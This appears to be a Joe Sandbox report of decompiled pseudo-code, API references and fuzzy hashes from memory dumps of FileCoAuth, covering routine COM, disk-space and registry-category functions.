    • Source File: 00000009.00000002.2316793338.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000002.2316778948.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000002.2316825591.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000002.2316842454.0000000000EB0000.00000004.sdmp
    • Associated: 00000009.00000002.2316855023.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: File$Find$memset$CloseFirstNextPathRegisterRemoveSpec
    • String ID:
    • API String ID: 247955269-0
    • Opcode ID: 9e9a9adf6d1064b2c9ee1744de9e077c298b7da2601aab9ddab9d2ee6e7487ce
    • Instruction ID: 7c2b2cbb2dfa482be8ea7ce294fb8e364d240e9bde90d0cdd3df24256b8098f0
    • Opcode Fuzzy Hash: 9e9a9adf6d1064b2c9ee1744de9e077c298b7da2601aab9ddab9d2ee6e7487ce
    • Instruction Fuzzy Hash: D63183B1A0021C9FDF20DF64DC89AEE73BCEF55304F0405A9A619E3141EB70AE89CB65
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 100%
    			E00E9A7CF(intOrPtr* __ecx, void* __eflags) {
    				intOrPtr* _t13;
    
    				_t13 = __ecx;
    				E00E9A822(__ecx);
    				 *__ecx = 0x38;
    				 *((intOrPtr*)(__ecx + 8)) = 0xe90000;
    				 *((intOrPtr*)(__ecx + 4)) = 0xe90000;
    				 *((intOrPtr*)(__ecx + 0xc)) = 0xc00;
    				 *((intOrPtr*)(__ecx + 0x10)) = 0xea6778;
    				if(E00E91E96(0xe90000, __ecx + 0x14) < 0) {
    					if(IsDebuggerPresent() != 0) {
    						OutputDebugStringW(L"ERROR : Unable to initialize critical section in CAtlBaseModule\n");
    					}
    					 *0xeb2314 = 1;
    				}
    				return _t13;
    			}

    APIs
      • Part of subcall function 00E9A822: memset.MSVCR120 ref: 00E9A82F
      • Part of subcall function 00E91E96: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,8007000E), ref: 00E91E9E
      • Part of subcall function 00E91E96: GetLastError.KERNEL32(?,00000000,00000000,?,8007000E), ref: 00E91EA8
    • IsDebuggerPresent.KERNEL32(?,?,?,00E91D7E), ref: 00E9A802
    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00E91D7E), ref: 00E9A811
    Strings
    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00E9A80C
    • xg, xrefs: 00E9A7F2
    Memory Dump Source
    • Source File: 00000009.00000002.2316793338.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000002.2316778948.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000002.2316825591.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000002.2316842454.0000000000EB0000.00000004.sdmp
    • Associated: 00000009.00000002.2316855023.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionStringmemset
    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule$xg
    • API String ID: 4206453544-4153916902
    • Opcode ID: fe8ddaaf86592a8cfd0cff75b378f138338adf2bbe8981734b49151e2e524e51
    • Instruction ID: 6882ccea9c5f1019fd45b62cc3d379fc2be0ac0f7a4f11405e6ac2a3d53145ff
    • Opcode Fuzzy Hash: fe8ddaaf86592a8cfd0cff75b378f138338adf2bbe8981734b49151e2e524e51
    • Instruction Fuzzy Hash: 89E092702003018FDB749F79E4083127AE4AF4A748F08993DE896E6640D7B4F848CBE2
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 89%
    			E00E97025(intOrPtr _a4, union _ULARGE_INTEGER* _a8, union _ULARGE_INTEGER* _a12, union _ULARGE_INTEGER* _a16) {
    				signed int _v8;
    				signed int _v12;
    				intOrPtr _v16;
    				WCHAR* _v20;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t13;
    				void* _t21;
    				void* _t23;
    				void* _t28;
    				void* _t29;
    				void* _t31;
    				void* _t32;
    				void* _t35;
    				signed int _t36;
    
    				_t38 = (_t36 & 0xfffffff8) - 0xc;
    				_t13 =  *0xeb0090; // 0xbd336131
    				_v8 = _t13 ^ (_t36 & 0xfffffff8) - 0x0000000c;
    				_v12 = _v12 & 0x00000000;
    				_v16 = _a4;
    				E00E9851B( &_v12, "Win32Api::GetDiskFreeSpaceExW");
    				GetDiskFreeSpaceExW(_v20, _a8, _a12, _a16);
    				E00E98588();
    				_t31 = _t29;
    				_t35 = _t32;
    				_t23 = _t21;
    				return E00EA29F2(_t23, _v12 ^ _t38, _t28, _t31, _t35);
    			}

    APIs
    • GetDiskFreeSpaceExW.KERNEL32(?,?,00000000,?,Win32Api::GetDiskFreeSpaceExW), ref: 00E97068
    Strings
    • Win32Api::GetDiskFreeSpaceExW, xrefs: 00E97053
    Memory Dump Source
    • Source File: 00000009.00000002.2316793338.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000002.2316778948.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000002.2316825591.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000002.2316842454.0000000000EB0000.00000004.sdmp
    • Associated: 00000009.00000002.2316855023.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: DiskFreeSpace
    • String ID: Win32Api::GetDiskFreeSpaceExW
    • API String ID: 1705453755-3568922165
    • Opcode ID: 5f39753da05f62d3b03cdea0f2b13bb77554ae3752b660fa4f1911812fcaec36
    • Instruction ID: fdf7b0a0f15a2802efa27b9fa0bcb0b75c24ef8af953e0e50fe7202cf11d5ff0
    • Opcode Fuzzy Hash: 5f39753da05f62d3b03cdea0f2b13bb77554ae3752b660fa4f1911812fcaec36
    • Instruction Fuzzy Hash: 84F08132604305ABC700DF69DD45A5BB7E8EB8A720F004919F958A7291DA30ED18C7A2
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 75%
    			E00E9ECC0(void* __esi, void* __eflags) {
    				void* _t18;
    				signed int _t20;
    				signed int _t24;
    				void* _t25;
    				void* _t26;
    				signed int _t27;
    				void* _t30;
    				void* _t33;
    
    				E00EA3161(E00EA4C2C, _t26, _t30, __esi);
    				 *(_t33 - 0x10) =  *(_t33 - 0x10) & 0x00000000;
    				 *(_t33 - 4) = 1;
    				_t18 = _t33 - 0x10;
    				__imp__CreateBindCtx(0, _t18, 4);
    				_t32 = _t18;
    				if(_t18 < 0) {
    					L3:
    					_t27 = 0;
    				} else {
    					_t24 =  *(_t33 - 0x10);
    					_t25 =  *((intOrPtr*)( *_t24 + 0x18))(_t24,  *((intOrPtr*)(_t33 + 8)));
    					_t32 = _t25;
    					if(_t25 < 0) {
    						goto L3;
    					} else {
    						_t27 =  *(_t33 - 0x10);
    						 *(_t33 - 0x10) =  *(_t33 - 0x10) & 0x00000000;
    					}
    				}
    				 *( *(_t33 + 0xc)) = _t27;
    				 *(_t33 - 4) =  *(_t33 - 4) | 0xffffffff;
    				_t20 =  *(_t33 - 0x10);
    				if(_t20 != 0) {
    					 *((intOrPtr*)( *_t20 + 8))(_t20);
    				}
    				return E00EA313E(_t32);
    			}

    APIs
    • __EH_prolog3.LIBCMT ref: 00E9ECC7
    • CreateBindCtx.OLE32(00000000,00000000), ref: 00E9ECDD
    Memory Dump Source
    • Source File: 00000009.00000002.2316793338.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000002.2316778948.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000002.2316825591.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000002.2316842454.0000000000EB0000.00000004.sdmp
    • Associated: 00000009.00000002.2316855023.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: BindCreateH_prolog3
    • String ID:
    • API String ID: 3589265608-0
    • Opcode ID: c884f359f7d3fa54e1e0e7f53668a8cf6eeff4117e2f3aade9702a408e52dcc3
    • Instruction ID: aaa8a09987754f83be0fd878ffaefbf4db0ee9959fbd4859393422c1f7d3fb45
    • Opcode Fuzzy Hash: c884f359f7d3fa54e1e0e7f53668a8cf6eeff4117e2f3aade9702a408e52dcc3
    • Instruction Fuzzy Hash: D20146B1A012259FCF04DFA4C808BBEB7B4BF09721F140558EA25AB380CB71A900CB90
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 37%
    			E00E921A2(void* __ecx, intOrPtr* _a4) {
    				void* _t4;
    				intOrPtr* _t8;
    				intOrPtr* _t11;
    				intOrPtr* _t14;
    				void* _t17;
    
    				_t8 = _a4;
    				if(_t8 != 0) {
    					_t17 = 0;
    					_t14 = __ecx + 0x28;
    					if( *_t14 != 0) {
    						L4:
    						 *_t8 =  *_t14;
    						_t11 =  *_t14;
    						 *((intOrPtr*)( *_t11 + 4))(_t11);
    						L5:
    						return _t17;
    					}
    					__imp__CoCreateInstance(0xea7298, 0, 1, 0xea75c4, _t14);
    					_t17 = _t4;
    					if(_t17 < 0) {
    						goto L5;
    					}
    					goto L4;
    				}
    				return 0x80004003;
    			}

    APIs
    • CoCreateInstance.OLE32(00EA7298,00000000,00000001,00EA75C4,?), ref: 00E921CF
    Memory Dump Source
    • Source File: 00000009.00000002.2316793338.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000002.2316778948.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000002.2316825591.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000002.2316842454.0000000000EB0000.00000004.sdmp
    • Associated: 00000009.00000002.2316855023.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: CreateInstance
    • String ID:
    • API String ID: 542301482-0
    • Opcode ID: 7d65a5e2528b89af5d8a9c24e94dc33c711ea0a8a64726fd8fd5a553f6107721
    • Instruction ID: 45bc680efdbbb072dd4d1666f0a33597cedab540ac7cb6082efa05ad38952ee0
    • Opcode Fuzzy Hash: 7d65a5e2528b89af5d8a9c24e94dc33c711ea0a8a64726fd8fd5a553f6107721
    • Instruction Fuzzy Hash: 73F08272305321BB8B208A4ADC84D87FF69FF9AB647140129FB09BB240C771AD91C6E0
    Uniqueness

    Uniqueness Score: -1,00%

    Memory Dump Source
    • Source File: 00000009.00000002.2316793338.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000002.2316778948.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000002.2316825591.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000002.2316842454.0000000000EB0000.00000004.sdmp
    • Associated: 00000009.00000002.2316855023.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_e90000_FileCoAuth.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: eeb57fb127891d248c5375ca62ab14c787cab61228f181d74c34b8be62bda9c0
    • Instruction ID: 28f81081e54c3c3fe9acdb58fd611feec5e228689653e31565a67e0d3cafbe26
    • Opcode Fuzzy Hash: eeb57fb127891d248c5375ca62ab14c787cab61228f181d74c34b8be62bda9c0
    • Instruction Fuzzy Hash: 52A02232008A0CCB022002833808A3233ACE2C3222A0800A0C020020008832B802C0C0
    Uniqueness

    Uniqueness Score: -1,00%

    Memory Dump Source
    • Source File: 00000009.00000002.2316793338.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000002.2316778948.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000002.2316825591.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000002.2316842454.0000000000EB0000.00000004.sdmp
    • Associated: 00000009.00000002.2316855023.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_e90000_FileCoAuth.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: af867031988d1e93d1f33451c3bab5638e9aa665bb94af2f62202d5f4176d987
    • Instruction ID: 552432a65a466be31d391fc92102282ccda79ca24349c63176a85813be10f0ab
    • Opcode Fuzzy Hash: af867031988d1e93d1f33451c3bab5638e9aa665bb94af2f62202d5f4176d987
    • Instruction Fuzzy Hash: A4A0223208820CCB02000283280A8323BACE2C3223A0800A0C038020028C32BC00C0C0
    Uniqueness

    Uniqueness Score: -1,00%

    Memory Dump Source
    • Source File: 00000009.00000002.2316793338.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000002.2316778948.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000002.2316825591.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000002.2316842454.0000000000EB0000.00000004.sdmp
    • Associated: 00000009.00000002.2316855023.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_e90000_FileCoAuth.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 3812afd6f8f53872c19a41dcd0d70fb85c3a997224783276a53f7ddb1773b6c5
    • Instruction ID: 4b42e11199626a5624b84486ed5ee8f426fea28ee6b9599d26420665564b2ac4
    • Opcode Fuzzy Hash: 3812afd6f8f53872c19a41dcd0d70fb85c3a997224783276a53f7ddb1773b6c5
    • Instruction Fuzzy Hash: 11A0223200820CCB02000283280883233CCC2C3222A0800A0C020020000833F80AC0E0
    Uniqueness

    Uniqueness Score: -1,00%

    Memory Dump Source
    • Source File: 00000009.00000002.2316793338.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000002.2316778948.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000002.2316825591.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000002.2316842454.0000000000EB0000.00000004.sdmp
    • Associated: 00000009.00000002.2316855023.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_e90000_FileCoAuth.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 9e8b77ebda1be74b234cf3a881a705d0146aed5095c8777981a55ad1b9f3d955
    • Instruction ID: 5c141a61835044b6c514d6dea91e93add5fb338f1ac3b6311f0c815beb5dc167
    • Opcode Fuzzy Hash: 9e8b77ebda1be74b234cf3a881a705d0146aed5095c8777981a55ad1b9f3d955
    • Instruction Fuzzy Hash: 87A0223200820CCF022003832808832338CC2C3222E0800A2C200020000832F800C0C0
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 48%
    			E00E92546(int __ecx, long __edx, intOrPtr _a4) {
    				signed int _v12;
    				char _v272;
    				char _v400;
    				int _v404;
    				void* _v408;
    				short* _v412;
    				short* _v416;
    				void* _v420;
    				short* _v424;
    				short* _v428;
    				void* _v432;
    				char _v448;
    				long _v452;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t69;
    				intOrPtr* _t71;
    				char* _t75;
    				intOrPtr* _t76;
    				intOrPtr* _t77;
    				intOrPtr* _t81;
    				short* _t82;
    				void* _t96;
    				void* _t107;
    				long _t111;
    				long _t116;
    				short* _t120;
    				short* _t122;
    				intOrPtr _t127;
    				intOrPtr _t128;
    				char* _t144;
    				intOrPtr* _t145;
    				void* _t148;
    				intOrPtr* _t149;
    				void* _t150;
    				signed int _t151;
    				void* _t160;
    				void* _t161;
    				void* _t162;
    				void* _t163;
    
    				_t143 = __edx;
    				_t69 =  *0xeb0090; // 0xbd336131
    				_v12 = _t69 ^ _t151;
    				_t120 = 0;
    				_v452 = __edx;
    				_t71 = 0;
    				_v408 = 0;
    				_t148 = __ecx;
    				_v404 = __ecx;
    				if(__edx == 0) {
    					L37:
    					_t122 = _t120;
    					L38:
    					_t120 = _t122;
    					L39:
    					if(_t71 != 0) {
    						 *((intOrPtr*)( *_t71 + 8))(_t71);
    					}
    					return E00EA29F2(_t120, _v12 ^ _t151, _t143, _t144, _t148);
    				}
    				_t160 =  *__ecx -  *0xea7288; // 0x0
    				if(_t160 != 0) {
    					L5:
    					_t75 =  &_v408;
    					__imp__CoCreateInstance(0xea72a8, _t120, 1, 0xea7544, _t75);
    					if(_t75 < 0) {
    						_t71 = _v408;
    						goto L37;
    					} else {
    						_t76 = _v452;
    						while( *_t76 != _t120) {
    							_t144 =  &_v448;
    							_t148 =  *(_t76 + 4);
    							_t143 =  &_v448;
    							_push( &_v448);
    							_push(1);
    							asm("movsd");
    							asm("movsd");
    							asm("movsd");
    							asm("movsd");
    							if(_a4 == _t120) {
    								_t77 = _v408;
    								_t148 = _v404;
    								_push(_t148);
    								_push(_t77);
    								_t127 =  *_t77;
    								if( *_t76 != 1) {
    									 *((intOrPtr*)(_t127 + 0x20))();
    								} else {
    									 *((intOrPtr*)(_t127 + 0x18))();
    								}
    								L16:
    								_t76 = _v452 + 8;
    								_v452 = _t76;
    								continue;
    							}
    							_t81 = _v408;
    							_push(_v404);
    							_push(_t81);
    							_t128 =  *_t81;
    							if( *_t76 != 1) {
    								_t82 =  *((intOrPtr*)(_t128 + 0x1c))();
    							} else {
    								_t82 =  *((intOrPtr*)(_t128 + 0x14))();
    							}
    							_t122 = _t82;
    							if(_t122 < 0) {
    								_t71 = _v408;
    								goto L38;
    							} else {
    								_t148 = _v404;
    								goto L16;
    							}
    						}
    						if(_a4 == _t120) {
    							__imp__StringFromGUID2(_t148,  &_v400, 0x40);
    							__imp__wcscpy_s( &_v272, 0x80, L"CLSID\\");
    							L00E91E60( &_v272);
    							_t145 = __imp__wcscat_s;
    							L00E91E60( *_t145( &_v272, 0x80,  &_v400));
    							L00E91E60( *_t145( &_v272, 0x80, L"\\Required Categories"));
    							_v404 = _t120;
    							asm("stosd");
    							asm("stosd");
    							asm("stosd");
    							_v432 = 0x80000000;
    							asm("stosd");
    							_v428 = _t120;
    							_v424 = _t120;
    							asm("stosd");
    							asm("stosd");
    							_v420 = _t120;
    							_v416 = _t120;
    							_v412 = _t120;
    							_t96 = E00E9235A(_t120,  &_v420, 0x80000000,  &_v272, 0x20019);
    							_t144 = RegCloseKey;
    							if(_t96 == 0) {
    								_t150 = _v420;
    								_t116 = RegQueryInfoKeyW(_t150, _t120, _t120, _t120,  &_v404, _t120, _t120, _t120, _t120, _t120, _t120, _t120);
    								_v452 = _t116;
    								if(_t150 != 0) {
    									RegCloseKey(_t150);
    									_t116 = _v452;
    									_v420 = _t120;
    								}
    								_v416 = _t120;
    								if(_t116 == 0 && _v404 == _t120) {
    									E00E922DF( &_v432,  &_v272);
    								}
    							}
    							__imp__wcscpy_s( &_v272, 0x80, L"CLSID\\");
    							L00E91E60( &_v272);
    							_t149 = __imp__wcscat_s;
    							L00E91E60( *_t149( &_v272, 0x80,  &_v400));
    							L00E91E60( *_t149( &_v272, 0x80, L"\\Implemented Categories"));
    							_t107 = E00E9235A(_t120,  &_v420, 0x80000000,  &_v272, 0x20019);
    							_t148 = _v420;
    							if(_t107 == 0) {
    								_t111 = RegQueryInfoKeyW(_t148, _t120, _t120, _t120,  &_v404, _t120, _t120, _t120, _t120, _t120, _t120, _t120);
    								_v452 = _t111;
    								if(_t148 != 0) {
    									RegCloseKey(_t148);
    									_t111 = _v452;
    									_t148 = _t120;
    								}
    								if(_t111 == 0 && _v404 == _t120) {
    									E00E922DF( &_v432,  &_v272);
    								}
    							}
    							if(_t148 != 0) {
    								RegCloseKey(_t148);
    							}
    							RegCloseKey(0x80000000);
    						}
    						_t71 = _v408;
    						goto L39;
    					}
    				}
    				_t161 =  *((intOrPtr*)(__ecx + 4)) -  *0xea728c; // 0x0
    				if(_t161 != 0) {
    					goto L5;
    				}
    				_t162 =  *((intOrPtr*)(__ecx + 8)) -  *0xea7290; // 0x0
    				if(_t162 != 0) {
    					goto L5;
    				}
    				_t163 =  *((intOrPtr*)(__ecx + 0xc)) -  *0xea7294; // 0x0
    				if(_t163 == 0) {
    					goto L37;
    				}
    				goto L5;
    			}

    Address range covered by the listing: 0x00e92546 - 0x00e928a6

    APIs
    • CoCreateInstance.OLE32(00EA72A8,00000000,00000001,00EA7544,?,?,Dv), ref: 00E925C1
    • StringFromGUID2.OLE32(?,?,00000040,?,Dv), ref: 00E92663
    • wcscpy_s.MSVCR120 ref: 00E9267A
    • wcscat_s.MSVCR120 ref: 00E926A3
    • wcscat_s.MSVCR120 ref: 00E926C0
    • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,80000000,?,00020019), ref: 00E9274B
    • RegCloseKey.ADVAPI32(?), ref: 00E9275C
    • wcscpy_s.MSVCR120 ref: 00E9279F
    • wcscat_s.MSVCR120 ref: 00E927C8
    • wcscat_s.MSVCR120 ref: 00E927E5
    • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,80000000,?,00020019), ref: 00E92829
    • RegCloseKey.ADVAPI32(?), ref: 00E9283A
    • RegCloseKey.ADVAPI32(?,80000000,?,00020019), ref: 00E92867
    • RegCloseKey.ADVAPI32(80000000,80000000,?,00020019), ref: 00E9286E
    Strings
    Memory Dump Source
    • Source File: 00000009.00000002.2316793338.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000002.2316778948.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000002.2316825591.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000002.2316842454.0000000000EB0000.00000004.sdmp
    • Associated: 00000009.00000002.2316855023.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: Closewcscat_s$InfoQuerywcscpy_s$CreateFromInstanceString
    • String ID: CLSID\$Dv$\Implemented Categories$\Required Categories
    • API String ID: 1945653186-993552892
    • Opcode ID: ee46fe441359051f47bf3ee32a53d727e18ca23ccd549d8ddbafa05c6d622d8a
    • Instruction ID: ceef259d9adcfe02b7ca737f66971cc5497ab2f303da7b7a504173c31a35f7ac
    • Opcode Fuzzy Hash: ee46fe441359051f47bf3ee32a53d727e18ca23ccd549d8ddbafa05c6d622d8a
    • Instruction Fuzzy Hash: 0F915171A01229AFDF25DF54CC91BEAB7B9BF4A344F0041E9EA49B7150D730AE848F91
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 48%
    			E00E92546(int __ecx, long __edx, intOrPtr _a4) {
    				signed int _v12;
    				char _v272;
    				char _v400;
    				int _v404;
    				void* _v408;
    				short* _v412;
    				short* _v416;
    				void* _v420;
    				short* _v424;
    				short* _v428;
    				void* _v432;
    				char _v448;
    				long _v452;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t69;
    				intOrPtr* _t71;
    				char* _t75;
    				intOrPtr* _t76;
    				intOrPtr* _t77;
    				intOrPtr* _t81;
    				short* _t82;
    				void* _t96;
    				void* _t107;
    				long _t111;
    				long _t116;
    				short* _t120;
    				short* _t122;
    				intOrPtr _t127;
    				intOrPtr _t128;
    				char* _t144;
    				intOrPtr* _t145;
    				void* _t148;
    				intOrPtr* _t149;
    				void* _t150;
    				signed int _t151;
    				void* _t160;
    				void* _t161;
    				void* _t162;
    				void* _t163;
    
    				_t143 = __edx;
    				_t69 =  *0xeb0090; // 0xbb40e64e
    				_v12 = _t69 ^ _t151;
    				_t120 = 0;
    				_v452 = __edx;
    				_t71 = 0;
    				_v408 = 0;
    				_t148 = __ecx;
    				_v404 = __ecx;
    				if(__edx == 0) {
    					L37:
    					_t122 = _t120;
    					L38:
    					_t120 = _t122;
    					L39:
    					if(_t71 != 0) {
    						 *((intOrPtr*)( *_t71 + 8))(_t71);
    					}
    					return E00EA29F2(_t120, _v12 ^ _t151, _t143, _t144, _t148);
    				}
    				_t160 =  *__ecx -  *0xea7288; // 0x0
    				if(_t160 != 0) {
    					L5:
    					_t75 =  &_v408;
    					__imp__CoCreateInstance(0xea72a8, _t120, 1, 0xea7544, _t75);
    					if(_t75 < 0) {
    						_t71 = _v408;
    						goto L37;
    					} else {
    						_t76 = _v452;
    						while( *_t76 != _t120) {
    							_t144 =  &_v448;
    							_t148 =  *(_t76 + 4);
    							_t143 =  &_v448;
    							_push( &_v448);
    							_push(1);
    							asm("movsd");
    							asm("movsd");
    							asm("movsd");
    							asm("movsd");
    							if(_a4 == _t120) {
    								_t77 = _v408;
    								_t148 = _v404;
    								_push(_t148);
    								_push(_t77);
    								_t127 =  *_t77;
    								if( *_t76 != 1) {
    									 *((intOrPtr*)(_t127 + 0x20))();
    								} else {
    									 *((intOrPtr*)(_t127 + 0x18))();
    								}
    								L16:
    								_t76 = _v452 + 8;
    								_v452 = _t76;
    								continue;
    							}
    							_t81 = _v408;
    							_push(_v404);
    							_push(_t81);
    							_t128 =  *_t81;
    							if( *_t76 != 1) {
    								_t82 =  *((intOrPtr*)(_t128 + 0x1c))();
    							} else {
    								_t82 =  *((intOrPtr*)(_t128 + 0x14))();
    							}
    							_t122 = _t82;
    							if(_t122 < 0) {
    								_t71 = _v408;
    								goto L38;
    							} else {
    								_t148 = _v404;
    								goto L16;
    							}
    						}
    						if(_a4 == _t120) {
    							__imp__StringFromGUID2(_t148,  &_v400, 0x40);
    							__imp__wcscpy_s( &_v272, 0x80, L"CLSID\\");
    							L00E91E60( &_v272);
    							_t145 = __imp__wcscat_s;
    							L00E91E60( *_t145( &_v272, 0x80,  &_v400));
    							L00E91E60( *_t145( &_v272, 0x80, L"\\Required Categories"));
    							_v404 = _t120;
    							asm("stosd");
    							asm("stosd");
    							asm("stosd");
    							_v432 = 0x80000000;
    							asm("stosd");
    							_v428 = _t120;
    							_v424 = _t120;
    							asm("stosd");
    							asm("stosd");
    							_v420 = _t120;
    							_v416 = _t120;
    							_v412 = _t120;
    							_t96 = E00E9235A(_t120,  &_v420, 0x80000000,  &_v272, 0x20019);
    							_t144 = RegCloseKey;
    							if(_t96 == 0) {
    								_t150 = _v420;
    								_t116 = RegQueryInfoKeyW(_t150, _t120, _t120, _t120,  &_v404, _t120, _t120, _t120, _t120, _t120, _t120, _t120);
    								_v452 = _t116;
    								if(_t150 != 0) {
    									RegCloseKey(_t150);
    									_t116 = _v452;
    									_v420 = _t120;
    								}
    								_v416 = _t120;
    								if(_t116 == 0 && _v404 == _t120) {
    									E00E922DF( &_v432,  &_v272);
    								}
    							}
    							__imp__wcscpy_s( &_v272, 0x80, L"CLSID\\");
    							L00E91E60( &_v272);
    							_t149 = __imp__wcscat_s;
    							L00E91E60( *_t149( &_v272, 0x80,  &_v400));
    							L00E91E60( *_t149( &_v272, 0x80, L"\\Implemented Categories"));
    							_t107 = E00E9235A(_t120,  &_v420, 0x80000000,  &_v272, 0x20019);
    							_t148 = _v420;
    							if(_t107 == 0) {
    								_t111 = RegQueryInfoKeyW(_t148, _t120, _t120, _t120,  &_v404, _t120, _t120, _t120, _t120, _t120, _t120, _t120);
    								_v452 = _t111;
    								if(_t148 != 0) {
    									RegCloseKey(_t148);
    									_t111 = _v452;
    									_t148 = _t120;
    								}
    								if(_t111 == 0 && _v404 == _t120) {
    									E00E922DF( &_v432,  &_v272);
    								}
    							}
    							if(_t148 != 0) {
    								RegCloseKey(_t148);
    							}
    							RegCloseKey(0x80000000);
    						}
    						_t71 = _v408;
    						goto L39;
    					}
    				}
    				_t161 =  *((intOrPtr*)(__ecx + 4)) -  *0xea728c; // 0x0
    				if(_t161 != 0) {
    					goto L5;
    				}
    				_t162 =  *((intOrPtr*)(__ecx + 8)) -  *0xea7290; // 0x0
    				if(_t162 != 0) {
    					goto L5;
    				}
    				_t163 =  *((intOrPtr*)(__ecx + 0xc)) -  *0xea7294; // 0x0
    				if(_t163 == 0) {
    					goto L37;
    				}
    				goto L5;
    			}

    Address range covered by the listing: 0x00e92546 - 0x00e928a6

    APIs
    • CoCreateInstance.OLE32(00EA72A8,00000000,00000001,00EA7544,?,?,?), ref: 00E925C1
    • StringFromGUID2.OLE32(?,?,00000040,?,?), ref: 00E92663
    • wcscpy_s.MSVCR120 ref: 00E9267A
    • wcscat_s.MSVCR120 ref: 00E926A3
    • wcscat_s.MSVCR120 ref: 00E926C0
    • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,80000000,?,00020019), ref: 00E9274B
    • RegCloseKey.ADVAPI32(?), ref: 00E9275C
    • wcscpy_s.MSVCR120 ref: 00E9279F
    • wcscat_s.MSVCR120 ref: 00E927C8
    • wcscat_s.MSVCR120 ref: 00E927E5
    • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,80000000,?,00020019), ref: 00E92829
    • RegCloseKey.ADVAPI32(?), ref: 00E9283A
    • RegCloseKey.ADVAPI32(?,80000000,?,00020019), ref: 00E92867
    • RegCloseKey.ADVAPI32(80000000,80000000,?,00020019), ref: 00E9286E
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
